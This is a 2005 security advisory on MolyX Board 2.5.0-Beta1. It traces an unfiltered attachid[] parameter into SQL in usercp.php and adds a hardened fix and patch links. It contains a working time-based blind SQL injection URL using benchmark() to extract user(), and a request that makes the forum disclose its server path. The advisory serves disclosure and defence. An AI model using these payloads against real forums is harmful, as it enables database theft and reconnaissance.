Author: SuperHei / Security Angel [S4T] 2005.09.21
Preamble:
MolyX Board (hereinafter MXB) is a PHP forum program developed by MolyX Studios, the group formerly known as the CNVBB team. MXB absorbs the strengths of many forum systems and is quite powerful, and years of experience developing and refining forum software have also made MXB fit users' habits well. However, vulnerabilities are inevitable.
Test version:
MolyX BOARD 2.5.0-Beta1
When an attachment is deleted, the attachid[] variable is not filtered, which leads to absolute-path disclosure and an SQL injection vulnerability. The analysis is as follows:
usercp.php, lines 397-407:
$affected_ids = count($_INPUT['attachid']);
if ( $affected_ids > 0 ) {
    // every element of attachid[] is interpolated into the IN (...) list unchanged
    $attachments = $DB->query("SELECT a.*, p.threadid, p.pid
        FROM ".TABLE_PREFIX."attachment a
        LEFT JOIN ".TABLE_PREFIX."post p ON ( a.postid=p.pid )
        WHERE a.attachmentid IN (".implode(",", $_INPUT['attachid']).")
        AND a.userid='".$bbuserinfo['id']."'");
    if ( $attachment = $DB->fetch_array($attachments) ) {
        if ( $attachment['location'] ) {
            @unlink( $bboptions['uploadfolder']."/".$attachment['attachpath']."/".$attachment['location'] );
        }
    }
}
We can see that attachid[] goes through $_INPUT['attachid'] straight into the database query, so let's look at how $_INPUT[] is built; global.php, line 23:
$_INPUT = $forums->func->init_variable();
Following init_variable() into includes/functions.php, the code is as follows:
// These are methods of the class reached as $forums->func (the class name below is
// assumed). The HTML entities in the replacement arrays were lost when the page was
// extracted; they are restored here to the obvious intent: each filtered character
// is replaced by its entity.
class func
{
    var $allow_unicode = 1;

    function init_variable()
    {
        $return = array();
        foreach (array($_GET, $_POST) AS $type) {
            if ( is_array($type) ) {
                foreach ( $type AS $k => $v ) {
                    if ( is_array($type[$k]) ) {
                        // one level of array values, e.g. attachid[]
                        foreach ( $type[$k] AS $k1 => $v1 ) {
                            $return[ $this->clean_key($k) ][ $this->clean_key($k1) ] = $this->clean_value($v1);
                        }
                    } else {
                        $return[ $this->clean_key($k) ] = $this->clean_value($v);
                    }
                }
            }
        }
        return $return;
    }

    function clean_key($key)
    {
        if ($key == "") return "";
        // strip "..", strip __name__ pairs, keep plain word characters as-is
        return preg_replace( array("/\.\./", "/\_\_(.+?)\_\_/", "/^([\w\.\-\_]+)$/"), array("", "", "$1"), $key );
    }

    function clean_value($val)
    {
        if ($val == "") return "";
        $pregfind    = array( "&#032;", "&",     "<!--",         "-->"      );
        $pregreplace = array( " ",      "&amp;", "&#60;&#33;--", "--&#62;"  );
        $val = str_replace($pregfind, $pregreplace, $val);
        $val = preg_replace( "/<script/i", "&#60;script", $val );
        $pregfind    = array( ">",    "<",    "\"",     "!",     "'"     );
        $pregreplace = array( "&gt;", "&lt;", "&quot;", "&#33;", "&#39;" );
        $val = str_replace($pregfind, $pregreplace, $val);
        $pregfind    = array( "/\n/",   "/\\$/",  "/\r/" );
        $pregreplace = array( "<br />", "&#036;", ""     );
        $val = preg_replace($pregfind, $pregreplace, $val);
        if ( $this->allow_unicode ) {
            // re-enable numeric entities that the "&" replacement above broke
            $val = preg_replace("/&amp;#([0-9]+);/s", "&#\\1;", $val );
        }
        if ( get_magic_quotes_gpc() ) {
            $val = stripslashes($val);
        }
        // finally turn user-supplied backslashes into an entity
        return preg_replace( "/\\\\(?!&amp;#|\?#)/", "&#092;", $val );
    }
}
It filters & < > \ ' <script and similar characters, but does nothing to digits, parentheses, commas or the = sign.
Exploitation in practice:
Because the results of the vulnerable query are never output, we cannot use UNION to replace the output with data of our choosing, and by default only administrators get to see the MySQL error message the forum returns; db_mysql.php, lines 141-147:
if ($bbuserinfo['usergroupid']==4) {
    // the page's copy reads "$this->error = ..." here, which would leave $the_error unset
    $the_error = @mysql_error($this->connection_id);
} else {
    $the_error = "";
}
$message = "database error: \n\n";
$message .= $the_error."\n\n";
So an ordinary user gets no error message back: 1=1 and 1=2 produce the same page, and the "classic" injection techniques cannot be used.
Fortunately, we have benchmark().
Note: & < > and so on cannot appear, so the injected statement is structured as follows:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid[]=1) and if((ascii(substring(user(),1,1))=0x72)|0,benchmark(100000,md5(0x41)),0)/*
If the response is delayed, we know that the first letter of user() has the hex value 0x72, that is, the letter r. Note that in this process only = can be used for the comparison, because < and > are filtered. :)
When $_INPUT['attachid'] is submitted as an ordinary variable instead of an array, implode() chokes on it and throws a warning that gives away the physical path.
Submit:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid
Returns: Warning: implode(): Bad arguments. in f:\www\www\xx\uploads\usercp.php on line 402
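Both problems above come from the same cause: the attachment IDs reach implode() and the IN (...) list without ever being forced into the integer type that the column holds. The following is an added example of a hardened version of the usercp.php block, written for this page and not the vendor's patch; it assumes the $DB, $bboptions, $bbuserinfo and TABLE_PREFIX names from the snippet above.

```php
<?php
// Added example (not MolyX's own code): validate attachid[] before it reaches SQL.
// Assumes $DB, $bboptions, $bbuserinfo and TABLE_PREFIX as used in usercp.php above.

/**
 * Reduce whatever arrived in $_INPUT['attachid'] to a list of distinct positive integers.
 * A scalar (the path-disclosure case) is wrapped into a one-element array instead of
 * being handed to implode(); anything that is not a positive number is dropped.
 */
function sanitize_attach_ids($raw)
{
    $ids = array();
    foreach ((array) $raw as $v) {
        // intval() keeps only the leading digits, so "1) and if(...)" collapses to 1
        $id = intval($v);
        if ($id > 0) {
            $ids[$id] = $id;   // keyed by value to remove duplicates
        }
    }
    return array_values($ids);
}

$ids = sanitize_attach_ids(isset($_INPUT['attachid']) ? $_INPUT['attachid'] : array());
if (count($ids) > 0) {
    // every element is now an int, so the IN (...) list contains only digits and commas;
    // userid is cast as well rather than relying on the surrounding quotes
    $attachments = $DB->query("SELECT a.*, p.threadid, p.pid
        FROM ".TABLE_PREFIX."attachment a
        LEFT JOIN ".TABLE_PREFIX."post p ON ( a.postid=p.pid )
        WHERE a.attachmentid IN (".implode(",", $ids).")
        AND a.userid=".intval($bbuserinfo['id']));
    if ($attachment = $DB->fetch_array($attachments)) {
        if ($attachment['location']) {
            @unlink($bboptions['uploadfolder']."/".$attachment['attachpath']."/".$attachment['location']);
        }
    }
}
```

The cast is what matters: clean_value() is an HTML-escaping routine, and the quote-free, digit-only payload shown above passes through it untouched because the injection point is numeric. Because implode() only ever sees an array here, the "Bad arguments" warning can no longer be triggered; on a production host display_errors should still be off so that any other warning does not disclose the web root.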
Patch:
The vendor released a patch on 2005.09.20: http://www.molyx.com/attachment.php?id=3097&u=2&EXT=txt&attach=1127146647.attach&filename=UPDATE_20050920.txt&attachpath=2
Worth mentioning: the patch fixes two vulnerabilities at once. The other one is in private.php, where $_INPUT['pmid'] is not strictly filtered. Its exploitation and analysis are much the same as the above, so I won't go into it; interested readers can look for themselves. (PS: the private.php vulnerability was not found by me; my guess is that the vendor found it themselves while looking at my test logs.)
This vulnerability had in fact been patched once before: http://4ngel.net/article/50.htm. But the fix in Angel's article suffers from a small error: it does not filter \ and ..., so on a Windows host the vulnerability remains. The vulnerability analysis can be found in Angel's article; the exploit can obtain the contents of includes/config.php.
The fixed version filters ../ and \.
Thank you for reading!